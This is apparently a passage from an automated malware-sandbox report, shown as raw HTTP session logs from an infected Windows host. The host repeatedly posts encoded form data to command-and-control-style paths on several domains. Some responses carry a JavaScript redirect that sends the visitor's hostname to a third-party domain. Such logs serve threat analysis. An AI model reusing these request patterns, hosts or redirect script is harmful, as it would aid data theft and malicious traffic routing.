                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
                                                                                                                                                                              Jan 11, 2025 03:59:25.769299984 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:25 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              60192.168.11.2049818209.74.77.10980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:28.294581890 CET2578OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 66 4b 64 52 37 61 41 31 79 63 54 45 6c 6a 30 6c 38 6c 44 52 4a 6f 39 64 55 6e 49 75 6c 4a 71 49 2b 69 51 49 70 30 71 49 72 74 54 45 73 42 69 4b 56 77 76 6c 4b 51 35 6c 4b 41 4a 45 43 78 73 4c 7a 6d 6a 74 75 44 52 31 47 7a 47 53 51 79 74 4d 47 41 56 43 2f 4d 6d 4a 71 4e 67 2f 54 71 6d 32 37 78 4c 70 32 76 62 2f 69 55 62 70 39 34 48 4f 4d 36 31 45 4e 6a 58 36 63 44 71 31 39 53 4b 55 57 2f 65 31 73 6e 54 4c 34 4b 72 62 6a 6a 69 56 41 67 67 44 4a 6c 67 4e 77 6a 2f 79 58 4b 4c 36 71 33 57 73 44 46 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8fKdR7aA1ycTElj0l8lDRJo9dUnIulJqI+iQIp0qIrtTEsBiKVwvlKQ5lKAJECxsLzmjtuDR1GzGSQytMGAVC/MmJqNg/Tqm27xLp2vb/iUbp94HOM61ENjX6cDq19SKUW/e1snTL4KrbjjiVAggDJlgNwj/yXKL6q3WsDFrQamS+3A+DqkC+A+4/AueFTbCzRjlbCIkVjYtR11q8SkeW9kFO+JEF2HQFvnjOJNlP/xZw2zAVULmpT0h6b9OAgOLgX/ArMQ2RmtcUun6IYP1YTMJwzxXrbfgFyK6aMbgZxigR6Z3n/ZTKnSKq2T1EWxGJsIZKn2ghnJUewetf0CbHlXByaHPbMYEHxVhcI/qXnc9b8c4XcMwz1gp2Zzn9eI+ZaNFyN6zbEDj3e/CycFr4NuFDHBqMl4MYEggAdeDazDv7h6lmwmId8No7OSr0Bch7jmfTBQDkm6g8gljmByHqN7kVOIGL3QfcnYncIJec+ASSovu3R2CrP33Yzqxcoui/m28lYDAZZZ9TjtrmDprTc3R8ez6JhdelD72gksBTPgFKAn3YY8VUBuBHrdDBKuMBXFeEyHC2m6FGFivrH7dDbFBIwxmiX6o2w5v8pLfn3AkdlBF5BJr7FsYdlnLKDpRjkKvXK84jgMiF6G3xBKfKv69BeYRw8797D7FwcsEzXpyNlfpXaIDJNfAiw1JcNBCSEkcSiVOMJ/rgdTaTLIqaO4wcsL9/OBbw+tBrvHu7KJfD/O4oqAjftwrDH5Zcxo/3nw0tVsQU1PczBggG3Y1oo5TutTA2gvTNAOmlGs25YUA+1NdX0eRkcW35hUbOSGGbp8FoBT/J [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:28.294661999 CET5352OUTData Raw: 67 6f 41 4b 4d 32 7a 33 67 79 45 4a 73 52 46 4d 4e 5a 73 6f 46 2f 67 71 52 4d 35 37 70 67 46 54 45 71 48 39 72 47 59 75 65 74 6b 53 38 70 7a 39 4e 55 6e 32 56 50 34 49 4c 33 66 4b 32 68 30 5a 30 34 56 4e 41 46 76 4a 6c 71 48 46 4f 4a 35 56 74 49
                                                                                                                                                                              Data Ascii: goAKM2z3gyEJsRFMNZsoF/gqRM57pgFTEqH9rGYuetkS8pz9NUn2VP4IL3fK2h0Z04VNAFvJlqHFOJ5VtIhh0EMo+NkZvcC/2qmfXjzYdAPuYldOIEDhIbQ9rqh/qoxTyBua+HpLpCxl7LuuOKiGH4z3hU5N6qBtWw9aD/4I4uveTQ9vVEezFAN/cbHmVPzgUIoisj+jJPFJXDd+UXFrnrUkSf+ohbjE1zDsp9BANw4S3VD7b/o
                                                                                                                                                                              Jan 11, 2025 03:59:28.474991083 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:28 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              61192.168.11.2049819209.74.77.10980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:30.995647907 CET489OUTGET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:59:31.175900936 CET199INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 48
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Raw: 66 75 6b 35 54 63 7a 6f 75 4c 58 72 6e 7a 65 6e 54 4e 4b 6c 62 34 69 53 2b 33 4f 69 2b 55 6a 6c 45 46 66 64 46 38 62 73 65 47 33 32 79 68 47 33
                                                                                                                                                                              Data Ascii: fuk5TczouLXrnzenTNKlb4iS+3Oi+UjlEFfdF8bseG32yhG3


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              62192.168.11.204982727.124.4.24680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:41.488176107 CET755OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 58 75 65 58 6d 6a 50 73 5a 6d 73 6d 78 4b 73 2b 47 78 63 54 63 35 73 68 4d 4c 2b 2f 57 6d 49 61 49 6b 4d 77 77 4b 68 67 37 55 6a 45 59 53 48 65 37 43 62 73 45 56 30 78 6c 43 55 6c 6f 52 33 4c 41 62 54 62 4f 43 74 2f 4c 75 30 52 49 6e 74 38 42 73 59 6c 6b 59 6f 73 6a 43 7a 4d 79 74 4d 79 46 4e 33 68 36 53 58 44 63 71 4c 54 38 49 68 4e 44 31 75 75 6f 79 48 47 78 72 54 62 2f 46 46 5a 4a 63 37 4f 75 6e 6c 39 58 4e 48 35 4d 4c 44 49 78 39 67 38 36 6b 70 78 6a 4c 46 41 79 47 52 44 33 48 31 68 6d 77 37 34 4c 75 47 63 57 6a 70 6f 36 78 75 5a 65 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g86kpxjLFAyGRD3H1hmw74LuGcWjpo6xuZeA==
                                                                                                                                                                              Jan 11, 2025 03:59:41.786242962 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              63192.168.11.204982927.124.4.24680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:44.320941925 CET775OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 38 61 4a 47 55 77 78 49 4a 67 34 55 6a 45 51 79 48 62 31 69 62 33 45 56 6f 54 6c 48 38 6c 6f 52 6a 4c 41 61 6a 62 4a 31 35 38 4c 2b 30 54 4f 6e 74 2b 4f 4d 59 6c 6b 59 6f 73 6a 43 57 72 79 74 45 79 46 64 6e 68 34 7a 58 43 48 4b 4c 55 73 59 68 4e 48 31 75 71 6f 79 48 6b 78 71 66 68 2f 41 42 5a 4a 5a 58 4f 75 32 6c 36 5a 4e 48 2f 52 62 43 5a 33 50 31 6a 35 41 59 5a 6e 49 56 6d 71 6b 78 55 79 52 34 37 37 43 50 63 49 39 61 75 53 54 51 41 34 7a 76 43 44 42 47 6f 67 34 66 44 70 59 55 64 64 38 36 37 6e 41 42 54 5a 46 6f 3d
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9auSTQA4zvCDBGog4fDpYUdd867nABTZFo=
                                                                                                                                                                              Jan 11, 2025 03:59:44.629468918 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              64192.168.11.204983027.124.4.24680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:47.133862972 CET2578OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6c 31 55 79 56 49 67 38 68 47 45 56 2f 61 62 4f 68 55 6b 75 7a 6a 39 49 67 2b 71 67 65 50 68 72 74 30 33 58 71 72 77 36 78 52 62 50 78 41 70 49 4a 36 4b 53 6b 4d 6c 53 4a 61 33 46 31 52 4d 6d 34 54 68 73 66 43 70 50 59 4d 32 31 4a 33 45 61 68 69 6d 70 45 61 45 6a 4e 54 58 2b 71 78 37 6d 43 43 34 50 4e 42 35 4c 4d 70 6f 6a 6a 47 76 53 7a 53 35 58 35 79 54 52 56 4c 45 66 71 46 4b 48 55 5a 70 67 57 6e 2f 54 53 51 44 68 52 71 75 5a 54 45 6c 54 48 74 51 6c 77 33 6d 59 65 31 34 59 42 31 39 42 37 6b [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYql1UyVIg8hGEV/abOhUkuzj9Ig+qgePhrt03Xqrw6xRbPxApIJ6KSkMlSJa3F1RMm4ThsfCpPYM21J3EahimpEaEjNTX+qx7mCC4PNB5LMpojjGvSzS5X5yTRVLEfqFKHUZpgWn/TSQDhRquZTElTHtQlw3mYe14YB19B7kVyRiKZqqaiJxStI2LgVQOMnrLuTKL65m0ics2qhqlK9+4hP7Tp86EWXuG8uHUdNZVoZYhQsu4wRn7LqsvFISv4//nhY5K3XLP8aFhL+faYNKCqsmYuSbuyzgBA1xTFAOzJXOPg2o9alaLoUIgdyU45fW3Dfi+rer9rvAUWiVpEGT21Hy+Us5bQFOkuI4ZhaYsd6GLjkBdc8dLIkYPE2UzcvIMg63h9q1NKtlZ7eT5Q3XhgyjNswi35R4ujEQeV6k2VKNN9KPBZjJV61s2Pu8njQXi9zv3OGuPsQza1FDn6I8Gr2vzw6PDpubGSYVpBOuDbcme9w2542znVtGy1AwNaqib0oUBKQpLgVqYJHR7btsAEiyioMUtPwaY+/1znV3holpJsfG9MFymdF4a9V2Xuz9wl+mi5uK6gpuNJHB5KTtMH64RWSHdAHx10TCbGuQYdusiQBqTbAyKQU3e40cqR3Q90P/7f6H8T2uhfPI4R53DFw+2XGmdoZvHk2bsZ2x/mKltXS1R7uMlvv/QCB3+emtMpo6XHVAaKBwb56yAta7jHHSlMklUaFzPcjNhUdvtbp45Zu55zxrWSOYU0+JTK3t4mMncI4StYRToop0FZK5bneIV4I8cq8Q+KtovoKt5yMHcCoaw8h7smbtEiRrFCH/DEAAZnqxgP [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:47.133928061 CET5346OUTData Raw: 57 5a 6f 37 5a 73 6d 2b 67 67 6a 39 71 55 56 59 38 6f 4f 46 68 37 32 68 67 50 6d 58 58 70 2b 72 72 33 5a 52 34 69 51 54 56 6a 71 63 4a 4d 55 4a 32 42 49 2f 5a 54 6f 43 54 43 6a 61 62 44 4e 43 45 52 57 4d 6f 55 39 30 79 6a 74 4f 42 6b 4d 6e 61 30
                                                                                                                                                                              Data Ascii: WZo7Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3
                                                                                                                                                                              Jan 11, 2025 03:59:47.424042940 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
